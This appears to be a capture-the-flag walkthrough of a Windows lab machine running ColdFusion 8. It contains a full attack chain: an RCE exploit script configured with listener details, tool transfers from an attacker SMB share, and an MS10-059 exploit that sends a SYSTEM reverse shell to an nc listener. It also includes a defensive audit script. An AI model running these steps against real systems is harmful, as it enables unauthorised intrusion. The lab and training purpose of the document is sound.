1. Recon
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs]
└─# nmap -sC -sV 10.129.53.229 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-04 23:26 +04
Nmap scan report for 10.129.53.229
Host is up (0.19s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
|_http-title: Index of /
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.41 seconds
1.2. Web reconnaissance
Port 8500 is open and is identified as a Web Server, so we browse to it and look around. Within it, we explore the CFIDE directory.

Inside that folder there is an administrator directory; visiting it shows that ADOBE COLDFUSION 8 is in use.

2. Penetrating the internal network
2.1. Searching for vulnerabilities with searchsploit
Searching searchsploit for coldfusion shows that an RCE vulnerability exists for version 8.
┌──(root㉿kali)-[/home/kali/labs]
└─# searchsploit coldfusion
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | multiple/remote/16985.rb
Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) | windows/remote/50781.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | windows/remote/43993.py
Adobe ColdFusion 2018 - Arbitrary File Upload | multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | cfm/webapps/33168.txt
Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read | multiple/webapps/51875.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure | multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | cfm/remote/21548.txt
ColdFusion MX - Remote Development Service | windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure | asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service | multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure | cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service | multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting | cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation | multiple/remote/24654.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Fetch that file.
┌──(root㉿kali)-[/home/kali/labs]
└─# searchsploit -m 50057.py
Exploit: Adobe ColdFusion 8 - Remote Command Execution (RCE)
URL: https://www.exploit-db.com/exploits/50057
Path: /usr/share/exploitdb/exploits/cfm/webapps/50057.py
Codes: CVE-2009-2265
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/labs/50057.py
2.2. Modifying the Python code
Inside the Python file there is a place to set the target IP/PORT and the listener IP/PORT.
[...SNIP...]
if __name__ == '__main__':
# Define some information
lhost = '10.10.14.143'
lport = 4444
rhost = "10.129.53.229"
rport = 8500
filename = uuid.uuid4().hex
[...SNIP...]
2.3. Getting a shell
Running the Python script then gives us a shell.
┌──(root㉿kali)-[/home/kali/labs/Arctic]
└─# python 50057.py
Generating a payload...
Payload size: 1498 bytes
Saved as: e2e826d5560f4f718ae64426782dbb4b.jsp
Priting request...
Content-type: multipart/form-data; boundary=0124ba0d31ae40e1a659c1645b48f490
Content-length: 1699
[...SNIP...]
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
The flag can then be obtained from user.txt.
C:\Users>cd tolis
cd tolis
C:\Users\tolis>cd Desktop
cd Desktop
C:\Users\tolis\Desktop>type user.txt
type user.txt
3. Privilege escalation
3.1. Checking privileges
SeImpersonatePrivilege stands out. One of the well-known Potato attacks is expected to work here.
C:\Users\tolis\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\tolis\Desktop>whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
3.2. Attack using PrintSpoofer - failed
As a trial I ran PrintSpoofer, one of the well-known Potato attacks, but it did not work.
C:\Users\tolis\Documents>copy \\10.10.14.143\share\PrintSpoofer64.exe .
copy \\10.10.14.143\share\PrintSpoofer64.exe .
1 file(s) copied.
C:\Users\tolis\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\Users\tolis\Documents
06/01/2026 05:53 <DIR> .
06/01/2026 05:53 <DIR> ..
04/01/2026 09:48 27.136 PrintSpoofer64.exe
1 File(s) 27.136 bytes
2 Dir(s) 1.432.952.832 bytes free
C:\Users\tolis\Documents>.\PrintSpoofer64.exe
.\PrintSpoofer64.exe
3.3. Examining systeminfo
Use the systeminfo command to check the operating system version. It turns out to be Windows Server 2008 R2.
C:\Users\tolis\Documents>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 6/1/2026, 5:20:26
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 5.056 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.228 MB
Virtual Memory: In Use: 1.057 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.10.10.2
IP address(es)
[01]: 10.129.53.229
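A defensive check covering the privilege listing in 3.1 and the systeminfo output in 3.3, added here as an example and not part of the original writeup: it parses both outputs and flags the two conditions this host exhibits, an enabled SeImpersonatePrivilege on the service account and a build with no hotfixes installed. The sample inputs are constructed to mirror the listings above.

```python
import re

# Sample `whoami /priv` and `systeminfo` lines, constructed to mirror the
# listings in this writeup (trimmed; the real commands print more lines).
WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
SYSTEMINFO = """\
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""
# Privileges that let a compromised service account escalate to SYSTEM via
# token impersonation (the "Potato" family the writeup refers to).
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

def parse_privileges(text):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def parse_systeminfo(text):
    """Map 'Key' -> 'value' for the top-level 'Key: value' lines of `systeminfo`."""
    info = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith(" "):
            key, _, value = line.partition(":")
            info[key.strip()] = value.strip()
    return info

def audit(priv_text, sysinfo_text):
    """Return the findings a defender would raise for this host."""
    findings = []
    privs = parse_privileges(priv_text)
    for name in sorted(IMPERSONATION_PRIVS & set(privs)):
        if privs[name] == "Enabled":
            findings.append(f"{name} enabled for the service account")
    info = parse_systeminfo(sysinfo_text)
    if info.get("Hotfix(s)", "").upper() == "N/A":
        findings.append(f"no hotfixes on {info.get('OS Version', '?')}")
    return findings
```

Both findings map to mitigations: run the ColdFusion service under a least-privilege virtual account without impersonation rights, and keep the host patched so kernel-level fixes such as MS10-059 are present.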
3.4. Using Chimichurri
This Windows version contains the MS10-059 vulnerability, and a public exploit exists that triggers it. Download the Chimichurri.exe file using smbserver.
Usage is simple: specify my Kali IP and port, and it connects back with a reverse shell.
C:\Users\tolis\Documents>copy \\10.10.14.143\share\Chimichurri.exe .
copy \\10.10.14.143\share\Chimichurri.exe .
1 file(s) copied.
C:\Users\tolis\Documents>.\Chimichurri.exe
.\Chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\Users\tolis\Documents>.\Chimichurri.exe 10.10.14.143 443
.\Chimichurri.exe 10.10.14.143 443
Through this, SYSTEM privileges are obtained.
┌──(root㉿kali)-[/home/kali]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.53.229] 49400
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\tolis\Documents>whoami
whoami
nt authority\system
C:\Users\tolis\Documents>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt